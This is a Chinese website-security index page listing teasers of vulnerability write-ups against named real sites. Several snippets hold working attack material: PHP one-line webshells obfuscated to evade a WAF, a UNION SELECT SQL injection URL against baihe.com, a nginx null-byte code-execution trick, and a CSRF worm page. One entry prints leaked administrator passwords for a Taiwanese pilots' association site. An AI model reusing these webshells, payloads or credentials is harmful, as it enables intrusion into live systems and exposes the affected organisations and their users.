PHP 5.4 (5.4.3) Code Execution (Win32) - 网站安全 - 自学关注热度:23

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)email(at)gmail.com// * Bug with Variant type parsing .....[详情]

关于php一句话免杀的分析 - 网站安全 - 自学php关注热度:13

一开始想这样：?php $_GET[#39;ts7#39;]($_POST[#39;cmd#39;]);?客户端用菜刀，密码cmd，url为test.php?ts7=assert这个应该算没有什么特征码了，但是缺点就是在web日志中会暴露出来assert可以都用post：...[详情]

过护卫神PHP一句话 - 网站安全 - 自学php关注热度:15

?php $a = str_replace(x,,axsxxsxexrxxt);$a($_POST[c]); ?测试成功..[详情]

网易微博CSRF漏洞 可能造成蠕虫 - 网站安全 - 自学关注热度:13

1、登陆http://t.163.com2、访问http://50.19.159.231/163.html3、回到微博首页，自动发微博加关注漏洞证明：htmlheadtitle163 weibo csrf test/titlescript type=text/javascript//follow mef.....[详情]

JWPlayer Xss 0day [Flash编程安全问题] - 网站安全 - 自关注热度:17

国外的一款播放器，使用网站数量超过百万，官方介绍：LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the - JW Player - i.....[详情]

益生康健网Ngnix空字节代码漏洞及修复 - 网站安全关注热度:16

益生康健漏洞nginx空字节可远程执行代码漏洞，可上传图片然后%00.php执行php脚本.看了下你们公司还是比较大, 漏洞补了后检查下后门.通过利用此漏洞，攻击者可以导致服务器使用PHP的..[详情]

走秀网某频道信息泄露及SQL注射引起的安全问题关注热度:14

走秀网某频道SQL注射及引起的安全问题详细说明：首先是一些信息泄漏：http://media.xiu.com/info.phphttp://media.xiu.com/user.phphttp://media.xiu.com/test.sql继而发现SQL注射：http://media.xiu.com/smallc.....[详情]

IT分众子站源代码泄露及修复 - 网站安全 - 自学关注热度:17

IT分众子站存在目录遍历漏洞，存在svn地址，用户名等敏感信息.可以下载修改应用源代码详细说明：img.itcpn.net 存在目录遍历http://img.itcpn.net/css/.svn其中包含svn信息用户名弱密码hanlei 12..[详情]

浅谈网站安全之MD5加密 - 网站安全 - 自学php关注热度:17

MD5加密算法在我们做网站开发的时候用过的很多，首先用户的密码我们每次都是要加密存进数据库。其实在C#中实现对数据（字符串）的MD5加密是非常简单的。引用using System.Security.Cryp..[详情]

Bypassing HTTP Basic Authentication in PHP Applications - 网站关注热度:23

Basic authentication doesnrsquo;t workUsing HTTP basic authentication to protect backends or adminitrative panels is a bad idea. Of course, setting up HTTP Basic auth for .....[详情]

How to bypass the restriction of the system function - 网站安关注热度:12

Requirements :Site vulnerable to LFIShellPhp wrappers musn#39;t be disabledBrain (that can be usefull)Introduction :You found an LFI vulnerability on a website and you want.....[详情]

XSS漏洞演示 - 网站安全 - 自学php关注热度:23

先扫描目标存在漏洞。扫出了好多XSS随便找一个测试下，弹窗出来了，可以利用把我们的利用代码转码，以免被浏览器安全策略过滤。复制转码后的代码，和漏洞地址合一块，生成一个..[详情]

百合网分站的一个注入漏洞及修复方案 - 网站安关注热度:11

http://qa.baihe.com/questions.php?action=detailid=-3916 union select 1,2,3,4,5,6,7,8,user(),database(),11,12,13,14,15,16,17,18,19,20--作者 Rookie..[详情]

搜狐白社会一个持久型XSS - 网站安全 - 自学php关注热度:15

某个地方XSS跨站,web2.0哦，算是高风险吧详细说明：这个家伙很赖，什么也留下漏洞证明：http://m.bai.sohu.com/status/topic.do?tid=1pic=truescore=4修复方案：过滤作者xnet..[详情]

台湾民航飞行员协会SQL注入导致信息泄露 - 网站关注热度:10

注入点：http://www.alpa.org.tw/ad_1.asp?id=179后台：http://www.alpa.org.tw/admin/index.asp管理员帐号密码：alpa alpa9202alparoy alpa2漏洞证明：修复方案：过滤作者 斯文的鸡蛋..[详情]